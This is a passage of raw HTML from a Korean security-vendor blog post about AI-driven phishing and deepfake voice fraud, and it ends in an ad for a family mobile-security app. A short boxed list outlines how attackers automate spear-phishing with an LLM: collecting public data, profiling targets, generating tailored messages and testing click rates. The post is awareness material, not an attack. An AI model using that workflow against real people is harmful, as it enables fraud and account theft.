&lt;p data-ke-size=&quot;size16&quot;&gt;ZeroThreat를 비롯한 다수의 보안 업체 분석에 따르면, LLM이 생성한 피싱 메일은 기존 규칙&amp;middot;시그니처 기반 필터를 우회해 실제 받은편지함까지 도달하는 비율이 크게 증가한 것으로 나타났습니다. 문장의 자연스러움과 문맥 정확도가 높아지면서, 사용자 스스로 피싱 여부를 판단하기가 점점 더 어려워지고 있다는 점도 공통적으로 지적되고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-7c6f203e-502a-4516-ba52-4df13f73638d&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;&lt;b&gt;✔&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;스피어피싱 자동화 흐름&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;공개&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;데이터&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;수집&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;(SNS,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;블로그&lt;span&gt;,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;기업&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;홈페이지&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;등&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;오픈&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;소스&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;정보&lt;span&gt;)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;LLM&lt;/span&gt;이&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;문체&lt;span&gt;&amp;middot;&lt;/span&gt;관심사&lt;span&gt;&amp;middot;&lt;/span&gt;직무&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;정보를&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;분석해&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;타깃&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;프로파일링&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;수행&lt;/li&gt;
&lt;li&gt;개인&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;맞춤형&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;피싱&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;메시지&lt;span&gt;&amp;middot;&lt;/span&gt;첨부&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;파일&lt;span&gt;&amp;middot;&lt;/span&gt;링크&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;자동&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;생성&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;자동&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;전송&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;및&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;반복&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;테스트를&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;통해&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;클릭률&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;극대화&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-7f53868b-3df9-4631-b359-9088e4cc2c75&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-7f53868b-3df9-4631-b359-9088e4cc2c75&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-7f53868b-3df9-4631-b359-9088e4cc2c75&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-870e1474-a66c-4e04-b997-0f8fe8ecbd71&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 기업 사칭 이메일은 내부 문서 스타일과 서명, 직함, 커뮤니케이션 톤까지 모방해 더 큰 피해로 이어지는 사례가 늘고 있습니다.&lt;/p&gt;
&lt;p id=&quot;SE-a7951375-0cff-4b95-a611-8fbde641212b&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-1fb72b2f-2ea0-4007-a04a-4769fc050663&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-96d59017-c754-46ce-aa9a-ce9dcfa4179b&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  &lt;span style=&quot;color: #333333;&quot;&gt;딥페이크&amp;middot;음성 사기 급증 - Fake Voice가 계정 탈취에 사용되는 방식&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-c72feecd-25cf-4077-bd6c-97cb0ca81875&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-c72feecd-25cf-4077-bd6c-97cb0ca81875&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-c72feecd-25cf-4077-bd6c-97cb0ca81875&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-235a19a1-f282-47a5-af1d-d2ac8b374cb8&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;딥페이크 음성&amp;middot;영상 기술의 발전은 피싱 공격을 단순한 링크 클릭 유도 수준을 넘어, 실시간 계정 탈취나 송금 사기로까지 확장시키고 있습니다. Pindrop의 &lt;i&gt;2025 Voice Intelligence &amp;amp; Security Report&lt;/i&gt;에 따르면 딥페이크 및 synthetic voice 기반 사기는 일부 산업에서 수년 사이 1,300% 이상 증가한 것으로 나타났으며, 콜센터를 중심으로 AI 음성 사기가 빠르게 확산되고 있음을 보여줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;또한 Signicat, Keepnet Labs 등의 조사에서는 딥페이크 기반 사기가 전체 사기 시도 중 약 6.5%를 차지할 만큼 비중이 확대된 것으로 분석됐으며, ZeroThreat 역시 이러한 흐름을 인용해 AI 사기 위협의 심각성을 강조하고 있습니다. 실제로 CEO의 음성을 합성해 긴급 송금을 요구하거나, 화상 회의나 인증 절차에서 딥페이크 영상을 활용해 신뢰를 속이는 사례도 국내외에서 잇따라 보고되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384080.png&quot; data-origin-width=&quot;1401&quot; data-origin-height=&quot;934&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ZCawc/dJMcagjQr8Y/CeQ85krhZyi4id36goGBN0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ZCawc/dJMcagjQr8Y/CeQ85krhZyi4id36goGBN0/img.png&quot; data-alt=&quot;[이미지] AI 활용 딥페이크 기술&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ZCawc/dJMcagjQr8Y/CeQ85krhZyi4id36goGBN0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FZCawc%2FdJMcagjQr8Y%2FCeQ85krhZyi4id36goGBN0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1401&quot; height=&quot;934&quot; data-filename=&quot;Group 2034384080.png&quot; data-origin-width=&quot;1401&quot; data-origin-height=&quot;934&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] AI 활용 딥페이크 기술&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-766450cb-c573-497f-b13f-8b492b93b391&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-766450cb-c573-497f-b13f-8b492b93b391&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-766450cb-c573-497f-b13f-8b492b93b391&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-766450cb-c573-497f-b13f-8b492b93b391&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-766450cb-c573-497f-b13f-8b492b93b391&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-8439ca1e-55a1-4f76-9ede-47a1caed36c4&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-8439ca1e-55a1-4f76-9ede-47a1caed36c4&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-8439ca1e-55a1-4f76-9ede-47a1caed36c4&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-18b08400-d18b-4962-b886-a8a84c53730c&quot;&gt;
&lt;p id=&quot;SE-9a44323e-96e9-4925-8ea6-0c81519a0ff8&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-03e18a91-88b3-41c4-baeb-8fbd85e8b6d1&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;✔ 딥페이크 의심 신호 체크리스트&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;음성이 지나치게 깨끗하거나 감정 변화가 일정함&lt;/li&gt;
&lt;li&gt;영상 속 얼굴 움직임&amp;middot;입 모양이 미세하게 어긋나거나 부자연스러움&lt;/li&gt;
&lt;li&gt;급박한&amp;nbsp;결정을&amp;nbsp;요구하면서&amp;nbsp;추가적인&amp;nbsp;검증(콜백,&amp;nbsp;메일&amp;nbsp;재확인&amp;nbsp;등)을&amp;nbsp;회피함&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-6ed58ad7-680d-4715-b1b8-a890a18c470c&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-6ed58ad7-680d-4715-b1b8-a890a18c470c&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-6ed58ad7-680d-4715-b1b8-a890a18c470c&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-693cc4f2-b663-45c2-aa7f-e76abc2df884&quot;&gt;
&lt;p id=&quot;SE-feafca47-522e-470e-8d77-9d9776fb893b&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;AI 딥페이크 기반 공격은 이제 단순한 피싱을 넘어 조직과 개인 간 신뢰 체계 자체를 흔드는 위협으로 진화하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-208a1128-e03e-4372-be64-75f4c2b1dfc4&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-d69a70f4-de70-44a4-a422-19dfce4b3502&quot; data-a11y-title=&quot;구분선&quot; data-compid=&quot;SE-d69a70f4-de70-44a4-a422-19dfce4b3502&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-d69a70f4-de70-44a4-a422-19dfce4b3502&quot; data-unitid=&quot;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-08cf4a91-e84a-4a38-8532-848b17496b37&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-08cf4a91-e84a-4a38-8532-848b17496b37&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-08cf4a91-e84a-4a38-8532-848b17496b37&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-a7ee610e-aee9-441d-a272-5aaae28eae51&quot;&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;  &lt;/b&gt;&lt;b&gt;AI 피싱 시대, 가족 단위 보안이 필요한 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p id=&quot;SE-e0d78bde-7598-4a97-9eb6-a731fb246aa9&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;AI 시대의 피싱은 더 이상 링크 클릭만을 노리는 공격이 아니라, 계정과 앱, 시스템 권한 자체를 직접 겨냥하는 형태로 빠르게 진화하고 있습니다. 공격 속도와 정교함이 높아지면서 사용자의 주의만으로 모든 위협을 막기에는 한계가 분명해졌고, 사람이 인지하기 전에 보안 시스템이 먼저 차단해주는 구조가 필수가 되고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 가족이 하나의 디지털 환경으로 연결된 상황에서는 한 명의 노출이 전체 피해로 확산되기 쉽습니다. 스미싱이나 가짜 앱에 상대적으로 취약한 부모님 세대까지 고려하면, 가족이 함께 관리하고 위험 알림을 공유할 수 있는 보안 방식의 중요성은 더욱 커지고 있습니다. 이러한 흐름 속에서 &amp;lsquo;가족 단위 보안&amp;rsquo;은 선택이 아닌, AI 시대에 필요한 현실적인 대응 방식으로 자리 잡고 있습니다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-e0d0f22f-e5bf-489d-94e3-ed3005723352&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-e0d0f22f-e5bf-489d-94e3-ed3005723352&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-e0d0f22f-e5bf-489d-94e3-ed3005723352&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-e0d0f22f-e5bf-489d-94e3-ed3005723352&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-e0d0f22f-e5bf-489d-94e3-ed3005723352&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-17a521fe-9611-4e4c-b7a4-72e84e9d7d6b&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-17a521fe-9611-4e4c-b7a4-72e84e9d7d6b&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-17a521fe-9611-4e4c-b7a4-72e84e9d7d6b&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-f8a35539-e008-4557-b972-d1b47efbf9c0&quot;&gt;
&lt;p id=&quot;SE-02c21373-5755-45b9-8920-8e9fb8b04850&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;알약 모바일 패밀리케어&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;1.jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/XeyQe/dJMcafkWiYi/xzRN4IT13Qtii1AxIBuxYK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/XeyQe/dJMcafkWiYi/xzRN4IT13Qtii1AxIBuxYK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/XeyQe/dJMcafkWiYi/xzRN4IT13Qtii1AxIBuxYK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FXeyQe%2FdJMcafkWiYi%2FxzRN4IT13Qtii1AxIBuxYK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1000&quot; data-filename=&quot;1.jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 모바일 앱의 패밀리케어는 AI 기반 스미싱 분석과 가족 보호 기능을 강화한 모바일 보안 서비스로, 고도화되는 AI 피싱 환경에서 맞춤형 스미싱 패턴에 대응할 수 있도록 설계되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;스미싱 메시지를 높은 정확도로 탐지하며, 가족 최대 4대까지 통합 보안 관리가 가능합니다. 부모님의 휴대폰에서 위험 징후가 감지될 경우 자녀 단말로 실시간 알림을 제공해, 가족 전체의 대응 속도를 높입니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-f6422f94-30d7-4657-b896-7a6138156416&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p id=&quot;SE-aacfb67b-7070-4c49-97a5-f4bdc67efed8&quot; style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;&amp;nbsp;주요기능&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li style=&quot;list-style-type: none;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Google Cloud 기반 Vertex AI 및 Gemini 모델을 활용한 문자 분석 엔진 적용&lt;/li&gt;
&lt;li&gt;스미싱 메시지를 높은 정확도로 탐지하는 AI 기반 필터링 기능 제공&lt;/li&gt;
&lt;li&gt;가족 4대까지 통합 보안 관리 지원&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;부모님&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;휴대폰에서&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;위험&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;징후가&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;감지될&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;경우&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;자녀&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;단말로&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;실시간&lt;/span&gt;&lt;span style=&quot;font-family: 